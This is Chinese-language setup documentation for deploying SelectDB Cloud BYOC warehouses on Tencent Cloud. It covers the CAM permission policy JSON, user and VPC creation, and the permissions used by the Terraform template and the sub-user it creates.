腾讯云前置准备
本文主要介绍创建 BYOC 类型仓库涉及的阿里云平台相关操作,包括创建 CAM 用户并授权、创建私有网络 VPC 和子网、了解资源编排 等。
准备 CAM 用户并授权
创建 BYOC 类型仓库前,需提前准备好具备相关权限的腾讯云 CAM 用户。
请将此文档发送给您的腾讯云管理员,请求管理员参照此文档为您创建 CAM 用户,并授权。
管理员访问腾讯云 访问管理 CAM (opens in a new tab) 控制台,执行以下操作:
创建权限策略
创建 SelectDB Cloud BYOC 类型仓库时,需要通过 CloudShell 执行 Terraform 模板,会创建 CVM、VPC、COS 等云资源或进行相关操作,因此需要一系列 CAM 权限。
点击左侧 策略,进入权限策略管理页面,点击新建自定义策略,选择按策略语法创建
选择空白模板,点击下一步
输入策略名称,清空原有文本框,复制以下脚本,输入文本框。详细的权限说明,请见下文 资源栈模板依赖的权限说明 部分。
{
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:DescribeInstancesCbsNum",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"cvm:DescribeImages",
"cvm:DescribeSecurityGroups",
"cvm:DescribeSecurityGroupPolicys",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:DescribeSecurityGroupAssociateInstances",
"cvm:DescribeKeyPairs",
"cvm:CreateKeyPair",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DescribeVpcEndPoint",
"vpc:DescribeVpcEndPointService",
"vpc:DescribeVpcEndPointServiceWhiteList",
"vpc:CheckVpcEndPointServiceExist",
"vpc:CreateVpcEndPoint",
"vpc:DeleteVpcEndPoint",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DisassociateVpcEndPointSecurityGroups",
"vpc:DescribeNetworkInterfaces",
"vpc:DescribeRouteTable",
"vpc:DescribeVpcLimits",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks",
"tag:DescribeResourceTagsByResourceIds",
"tag:TagResources",
"tag:UnTagResources"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing::*"
]
},
{
"action": [
"cam:GetPolicy",
"cam:GetPolicyVersion",
"cam:ListPolicyVersions",
"cam:ListAccessKeys",
"cam:GetUserPermissionBoundary",
"cam:ListUserTags",
"cam:QueryApiKey",
"cam:CheckUserPolicyAttachment",
"cam:CreatePolicy",
"cam:DeletePolicy",
"cam:UpdatePolicy",
"cam:GetAccountSummary",
"cam:DescribeSubAccounts",
"cam:ListSubAccounts",
"cam:GetUser",
"cam:GetUserAppId",
"cam:ListUsers",
"cam:GetAllMaskedSubUser",
"cam:GetUserPermissionBoundary",
"cam:AddUser",
"cam:AttachUserPolicy",
"cam:ListAttachedUserPolicies",
"cam:ListAttachedUserAllPolicies",
"cam:CheckUserPolicyAttachment",
"cam:DetachUserPolicy",
"cam:DeleteUser",
"cam:UpdateUser",
"cam:ListUserTags",
"cam:DescribeRoleList",
"cam:GetRole",
"cam:CreateRole",
"cam:GetRolePermissionBoundary",
"cam:GetServiceLinkedRoleDeletionStatus",
"cam:CreateServiceLinkedRole",
"cam:PutRolePermissionsBoundary",
"cam:AttachRolePolicy",
"cam:ListAttachedRolePolicies",
"cam:DeleteRole",
"cam:DeleteRolePermissionsBoundary",
"cam:DeleteServiceLinkedRole",
"cam:DetachRolePolicy",
"cam:LogoutRoleSessions",
"cam:PassRole",
"cam:ListRoleTags",
"cam:TagRole",
"cam:UntagRole",
"cam:UpdateRoleConsoleLogin",
"cam:UpdateRoleDescription",
"cam:UpdateAssumeRolePolicy",
"cam:ListAccessKeys",
"cam:QueryApiKey",
"cam:DeleteApiKey",
"cam:CreateApiKey",
"cam:CreateAccessKey",
"cam:DeleteAccessKey",
"cam:UpdateAccessKey"
],
"effect": "allow",
"resource": [
"*"
]
}
],
"version": "2.0"
}点击完成,完成创建权限策略。
创建 IAM 用户,并授权
提示: 如果已有 IAM 用户,可以跳过创建 IAM 用户步骤,直接对已有 IAM 用户授权。
点击左侧 用户,进入用户管理页面,点击新建用户 > 快速新建用户,输入相关信息,点击创建用户,完成用户创建。
返回用户列表,点击用户右侧授权按钮,选中上述步骤创建的策略,点击确定,完成授权。
创建 IAM 用户组,并授权(可选)
提示: 如果已有 IAM 用户组,可以跳过创建 IAM 用户组步骤,直接对已有 IAM 用户组授权。
如果企业内存在多名人员使用 SelectDB Cloud,可以创建 CAM 用户组,并将相关人员加入用户组,并统一授权。
点击左侧 用户组,进入用户组管理页面,点击新建用户组,输入用户组名,点击下一步,选择上述步骤创建的策略,点击完成,完成创建。
准备私有网络 VPC 和子网
提示:
- 如果已有符合地域要求的 VPC ,并期望将 BYOC 仓库部署在此 VPC 内,可以跳过下面创建私有网络 VPC 和子网步骤。
- 当前支持的地域和子网可用区为:
- 华北地区(北京):北京三区、北京六区、北京七区
- 华南地区(广州):广州六区、广州七区
创建 BYOC 类型仓库前,需要使用上述 CAM 用户提前创建私有网络 VPC 和子网,以下是具体操作。
打开腾讯云 私有网络 VPC (opens in a new tab) 控制台,切换到您期望创建 BYOC 仓库的地域,点击 新建,进入 VPC 创建页面。
输入名称、选择 IPv4 CIDR,子网名称,子网 IPv4 CIDR,子网可用区,点击确定完成创建。
了解资源编排
当用户创建 BYOC 类型仓库时,会首先借助云厂商的资源编排服务自动部署 Agent,完成 Agent 与 SelectDB Cloud 平台之间的私有连接,然后由 Agent 负责 BYOC 仓库的部署与管理工作。
Terraform 模板说明
SelectDB 提供的 Terraform 资源编排模板运行在您的腾讯云账号下,并且模版代码可见、可审计,不会对您的数据与 VPC 内的其他环境进行操作。您可以通过以下链接获取 SelectDB 提供的 Terraform 模板:
https://online-bj-1313869400.cos.ap-beijing.myqcloud.com/public/txcloud-ap-beijing-byoc-cf.tf当您通过腾讯云 CloudShell 运行上述 Terraform 模板时,它会自动进行 Agent 的创建与部署。然后 Agent 会与 SelectDB Cloud 建立私有连接,并完成仓库初始化流程。
在完成资源编排脚本执行后,您即可从 SelectDB Cloud 平台进入相应仓库,像使用普通的仓库一样,开始新建用于数据分析的计算集群。
Terraform 模板所依赖的权限
在您的云账号下通过 CloudShell 执行 Terraform 模板时,会创建 CVM、VPC、COS 等云资源或进行相关操作,因此需要一系列 CAM 权限。在正式执行前,请确保执行此模板的用户具备相应权限,否则可能会遇到执行模板失败的情况。
注意 Terraform 模版的执行过程完全在您的云账号下进行,创建出来的资源也都属于您的云账号。SelectDB 不会获取您的云账号信息,也无法使用该账号的相应 RAM 权限。
{
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:DescribeInstancesCbsNum",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"cvm:DescribeImages",
"cvm:DescribeSecurityGroups",
"cvm:DescribeSecurityGroupPolicys",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:DescribeSecurityGroupAssociateInstances",
"cvm:DescribeKeyPairs",
"cvm:CreateKeyPair",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DescribeVpcEndPoint",
"vpc:DescribeVpcEndPointService",
"vpc:DescribeVpcEndPointServiceWhiteList",
"vpc:CheckVpcEndPointServiceExist",
"vpc:CreateVpcEndPoint",
"vpc:DeleteVpcEndPoint",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DisassociateVpcEndPointSecurityGroups",
"vpc:DescribeNetworkInterfaces",
"vpc:DescribeRouteTable",
"vpc:DescribeVpcLimits",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks",
"tag:DescribeResourceTagsByResourceIds",
"tag:TagResources",
"tag:UnTagResources"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing::*"
]
},
{
"action": [
"cam:GetPolicy",
"cam:GetPolicyVersion",
"cam:ListPolicyVersions",
"cam:ListAccessKeys",
"cam:GetUserPermissionBoundary",
"cam:ListUserTags",
"cam:QueryApiKey",
"cam:CheckUserPolicyAttachment",
"cam:CreatePolicy",
"cam:DeletePolicy",
"cam:UpdatePolicy",
"cam:GetAccountSummary",
"cam:DescribeSubAccounts",
"cam:ListSubAccounts",
"cam:GetUser",
"cam:GetUserAppId",
"cam:ListUsers",
"cam:GetAllMaskedSubUser",
"cam:GetUserPermissionBoundary",
"cam:AddUser",
"cam:AttachUserPolicy",
"cam:ListAttachedUserPolicies",
"cam:ListAttachedUserAllPolicies",
"cam:CheckUserPolicyAttachment",
"cam:DetachUserPolicy",
"cam:DeleteUser",
"cam:UpdateUser",
"cam:ListUserTags",
"cam:DescribeRoleList",
"cam:GetRole",
"cam:CreateRole",
"cam:GetRolePermissionBoundary",
"cam:GetServiceLinkedRoleDeletionStatus",
"cam:CreateServiceLinkedRole",
"cam:PutRolePermissionsBoundary",
"cam:AttachRolePolicy",
"cam:ListAttachedRolePolicies",
"cam:DeleteRole",
"cam:DeleteRolePermissionsBoundary",
"cam:DeleteServiceLinkedRole",
"cam:DetachRolePolicy",
"cam:LogoutRoleSessions",
"cam:PassRole",
"cam:ListRoleTags",
"cam:TagRole",
"cam:UntagRole",
"cam:UpdateRoleConsoleLogin",
"cam:UpdateRoleDescription",
"cam:UpdateAssumeRolePolicy",
"cam:ListAccessKeys",
"cam:QueryApiKey",
"cam:DeleteApiKey",
"cam:CreateApiKey",
"cam:CreateAccessKey",
"cam:DeleteAccessKey",
"cam:UpdateAccessKey"
],
"effect": "allow",
"resource": [
"*"
]
}
],
"version": "2.0"
}具体权限划分如下:
-
Cloud Virtual Machine (CVM) 权限:
- 管理 CVM 实例
"cvm:DescribeInstances", "cvm:DescribeInstanceAttributes", "cvm:InquiryPriceRunInstances", "cvm:RunInstances", "cvm:StartInstances", "cvm:StopInstances", "cvm:PurgeInstances", "cvm:RebootInstances", "cvm:TerminateInstances", "cvm:RenewInstances", "cvm:ViewModifyInstancesAttribute", "cvm:ModifyInstancesAttribute", "cvm:ModifyInstancesChargeType", "cvm:ResetInstancesType", "cvm:DescribeInstancesCbsNum", "cvm:CreateCbsStorages", "cvm:AttachCbsStorages", "cvm:DetachCbsStorages", "cvm:ResizeCbsStorage", "cvm:ModifyCbsStorageAttributes", "cvm:DescribeDisks", "cvm:CreateDisks", "cvm:AttachDisks", "cvm:DetachDisks", "cvm:RenewDisk", "cvm:ResizeDisk", "cvm:ModifyDiskAttributes", "cvm:DescribeImages",- 管理 CVM 安全组
"cvm:DescribeSecurityGroups", "cvm:DescribeSecurityGroupPolicys", "cvm:CreateSecurityGroup", "cvm:CreateSecurityGroupPolicy", "cvm:ModifySecurityGroupAttributes", "cvm:ModifySingleSecurityGroupPolicy", "cvm:ModifySecurityGroupPolicys", "cvm:AssociateSecurityGroups", "cvm:DisassociateSecurityGroups", "cvm:DeleteSecurityGroup", "cvm:DeleteSecurityGroupPolicy", "cvm:DescribeSecurityGroupAssociateInstances",- 管理 CVM SSH 密钥对
"cvm:DescribeKeyPairs", "cvm:CreateKeyPair", "cvm:AssociateInstancesKeyPairs", "cvm:DisassociateInstancesKeyPairs", "cvm:DeleteKeyPairs",- 执行 CVM 云助手相关操作,标签管理
"tat:RunCommand", "tat:DescribeInvocations", "tat:DescribeInvocationTasks", "tag:DescribeResourceTagsByResourceIds", "tag:TagResources", "tag:UnTagResources" -
Virtual Private Cloud (VPC) 、PrivateLink 和LB 权限:
- 获取 VPC 相关资源信息
"vpc:DescribeVpcEx", "vpc:DescribeSubnet", "vpc:DescribeSubnetEx", "vpc:DescribeNetworkInterfaces", "vpc:DescribeRouteTable", "vpc:DescribeVpcLimits",- 管理终端节点资源
"vpc:ModifyVpcEndPointAttribute", "vpc:DescribeVpcEndPoint", "vpc:DescribeVpcEndPointService", "vpc:DescribeVpcEndPointServiceWhiteList", "vpc:CheckVpcEndPointServiceExist", "vpc:CreateVpcEndPoint", "vpc:DeleteVpcEndPoint", "vpc:ModifyVpcEndPointAttribute", "vpc:DisassociateVpcEndPointSecurityGroups",- 管理负载均衡器(CLB)资源
"clb:DescribeLoadBalancers", "clb:DescribeLoadBalancersDetail", "clb:InquiryPriceCreateLoadBalancer", "clb:InquiryPriceRefundLoadBalancer", "clb:InquiryPriceRenewLoadBalancer", "clb:CreateLoadBalancer", "clb:DeleteLoadBalancer", "clb:DeleteLoadBalancers", "clb:DescribeListeners", "clb:DescribeLBListeners", "clb:DescribeLoadBalancerListeners", "clb:CreateListener", "clb:CreateLoadBalancerListeners", "clb:SetLoadBalancerStartStatus", "clb:DeleteListener", "clb:DeleteLoadBalancerListeners", "clb:DescribeTargets", "clb:DescribeTargetGroups", "clb:DescribeTargetGroupList", "clb:DescribeTargetGroupInstances", "clb:CreateTargetGroup", "clb:ModifyTargetGroupAttribute", "clb:DeleteTargetGroups", "clb:RegisterTargets", "clb:DeregisterTargets", "clb:BatchRegisterTargets", "clb:BatchDeregisterTargets", "clb:RegisterTargetGroupInstances", "clb:AssociateTargetGroups", "clb:DisassociateTargetGroups", "clb:RegisterInstancesWithLoadBalancer", "clb:DeregisterTargetGroupInstances", "clb:DeregisterInstancesFromLoadBalancer", "clb:CreateRule", "clb:CreateListenerRules", "clb:ModifyRule", "clb:DeleteRule", "clb:SetSecurityGroups", "clb:SetSecurityGroupForLoadbalancers", "clb:SetLoadBalancerSecurityGroups" -
Finance 权限:
- 允许购买 CVM 和CLB 资源
{ "action": [ "finance:*" ], "effect": "allow", "resource": [ "qcs::cvm:::*", "qcs::clb:::*" ] }, -
Cloud Object Storage (COS) 权限:
- 管理 COS 存储桶以及对存储桶及其内容进行读写操作(针对特定桶)
{ "action": [ "cos:*" ], "effect": "allow", "resource": [ "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}", "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*" ] }, -
Cloud Access Management(CAM) 权限:
- 管理策略
"cam:GetPolicy", "cam:GetPolicyVersion", "cam:ListPolicyVersions", "cam:GetUserPermissionBoundary", "cam:ListUserTags", "cam:QueryApiKey", "cam:CheckUserPolicyAttachment", "cam:CreatePolicy", "cam:DeletePolicy", "cam:UpdatePolicy",- 管理子用户,获取账号信息
"cam:GetAccountSummary", "cam:DescribeSubAccounts", "cam:ListSubAccounts", "cam:GetUser", "cam:GetUserAppId", "cam:ListUsers", "cam:GetAllMaskedSubUser", "cam:GetUserPermissionBoundary", "cam:AddUser", "cam:AttachUserPolicy", "cam:ListAttachedUserPolicies", "cam:ListAttachedUserAllPolicies", "cam:CheckUserPolicyAttachment", "cam:DetachUserPolicy", "cam:DeleteUser", "cam:UpdateUser", "cam:ListUserTags",- 管理 CAM 访问密钥
"cam:ListAccessKeys", "cam:QueryApiKey", "cam:DeleteApiKey", "cam:CreateApiKey", "cam:CreateAccessKey", "cam:DeleteAccessKey", "cam:UpdateAccessKey"- 管理角色
"cam:DescribeRoleList", "cam:GetRole", "cam:CreateRole", "cam:GetRolePermissionBoundary", "cam:GetServiceLinkedRoleDeletionStatus", "cam:CreateServiceLinkedRole", "cam:PutRolePermissionsBoundary", "cam:AttachRolePolicy", "cam:ListAttachedRolePolicies", "cam:DeleteRole", "cam:DeleteRolePermissionsBoundary", "cam:DeleteServiceLinkedRole", "cam:DetachRolePolicy", "cam:LogoutRoleSessions", "cam:PassRole", "cam:ListRoleTags", "cam:TagRole", "cam:UntagRole", "cam:UpdateRoleConsoleLogin", "cam:UpdateRoleDescription", "cam:UpdateAssumeRolePolicy",
Terraform 模板创建的子用户的权限说明
初次执行完 Terraform 模板后会创建一个子用户,用于后续在您的 VPC 内管控数据仓库相关组件,以下为该子用户拥有的权限说明。
注意 创建出来的子用户隶属于您的云账号,并只在您的 VPC 内使用,不会外泄。
{
"version": "2.0",
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"cvm:DescribeSecurityGroups",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}",
"qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*"
]
},
{
"action": [
"name/sts:AssumeRole"
],
"effect": "allow",
"resource": [
"qcs::cam::uin/${data.tencentcloud_user_info.SelectDBUserAccount.owner_uin}:roleName/${tencentcloud_cam_role.SelectDBRole.name}"
]
}
]
}具体权限划分如下:
-
Cloud Virtual Machine (CVM) 权限:
- 管理 CVM 实例
"cvm:DescribeInstances", "cvm:DescribeInstanceAttributes", "cvm:InquiryPriceRunInstances", "cvm:RunInstances", "cvm:StartInstances", "cvm:StopInstances", "cvm:PurgeInstances", "cvm:RebootInstances", "cvm:TerminateInstances", "cvm:RenewInstances", "cvm:ViewModifyInstancesAttribute", "cvm:ModifyInstancesAttribute", "cvm:ModifyInstancesChargeType", "cvm:ResetInstancesType", "cvm:CreateCbsStorages", "cvm:AttachCbsStorages", "cvm:DetachCbsStorages", "cvm:ResizeCbsStorage", "cvm:ModifyCbsStorageAttributes", "cvm:DescribeDisks", "cvm:CreateDisks", "cvm:AttachDisks", "cvm:DetachDisks", "cvm:RenewDisk", "cvm:ResizeDisk", "cvm:ModifyDiskAttributes",- 管理 CVM 安全组
"cvm:DescribeSecurityGroups", "cvm:CreateSecurityGroup", "cvm:CreateSecurityGroupPolicy", "cvm:ModifySecurityGroupAttributes", "cvm:ModifySingleSecurityGroupPolicy", "cvm:ModifySecurityGroupPolicys", "cvm:AssociateSecurityGroups", "cvm:DisassociateSecurityGroups", "cvm:DeleteSecurityGroup", "cvm:DeleteSecurityGroupPolicy",- 管理 CVM SSH 密钥对
"cvm:AssociateInstancesKeyPairs", "cvm:DisassociateInstancesKeyPairs", "cvm:DeleteKeyPairs",- 执行 CVM 云助手相关操作
"tat:RunCommand", "tat:DescribeInvocations", "tat:DescribeInvocationTasks" -
Virtual Private Cloud (VPC) 和 CLB 权限:
- 获取 VPC 相关资源信息
"vpc:DescribeVpcEx", "vpc:DescribeSubnet", "vpc:DescribeSubnetEx", "vpc:ModifyVpcEndPointAttribute",- 管理负载均衡器(CLB)资源
"clb:DescribeLoadBalancers", "clb:DescribeLoadBalancersDetail", "clb:InquiryPriceCreateLoadBalancer", "clb:InquiryPriceRefundLoadBalancer", "clb:InquiryPriceRenewLoadBalancer", "clb:CreateLoadBalancer", "clb:DeleteLoadBalancer", "clb:DeleteLoadBalancers", "clb:DescribeListeners", "clb:DescribeLBListeners", "clb:DescribeLoadBalancerListeners", "clb:CreateListener", "clb:CreateLoadBalancerListeners", "clb:SetLoadBalancerStartStatus", "clb:DeleteListener", "clb:DeleteLoadBalancerListeners", "clb:DescribeTargets", "clb:DescribeTargetGroups", "clb:DescribeTargetGroupList", "clb:DescribeTargetGroupInstances", "clb:CreateTargetGroup", "clb:ModifyTargetGroupAttribute", "clb:DeleteTargetGroups", "clb:RegisterTargets", "clb:DeregisterTargets", "clb:BatchRegisterTargets", "clb:BatchDeregisterTargets", "clb:RegisterTargetGroupInstances", "clb:AssociateTargetGroups", "clb:DisassociateTargetGroups", "clb:RegisterInstancesWithLoadBalancer", "clb:DeregisterTargetGroupInstances", "clb:DeregisterInstancesFromLoadBalancer", "clb:CreateRule", "clb:CreateListenerRules", "clb:ModifyRule", "clb:DeleteRule", "clb:SetSecurityGroups", "clb:SetSecurityGroupForLoadbalancers", "clb:SetLoadBalancerSecurityGroups" -
Finance 权限:
- 允许购买 CVM 和LB 资源
{ "action": [ "finance:*" ], "effect": "allow", "resource": [ "qcs::cvm:::*", "qcs::clb:::*" ] }, -
Cloud Object Storage (COS) 权限:
- 管理 COS 存储桶以及对存储桶及其内容进行读写操作(针对特定桶)
{ "action": [ "cos:*" ], "effect": "allow", "resource": [ "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}", "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*" ] }, -
Cloud Access Management(CAM) 权限:
- 允许扮演特定角色
{ "action": [ "name/sts:AssumeRole" ], "effect": "allow", "resource": [ "qcs::cam::uin/${data.tencentcloud_user_info.SelectDBUserAccount.owner_uin}:roleName/${tencentcloud_cam_role.SelectDBRole.name}" ] }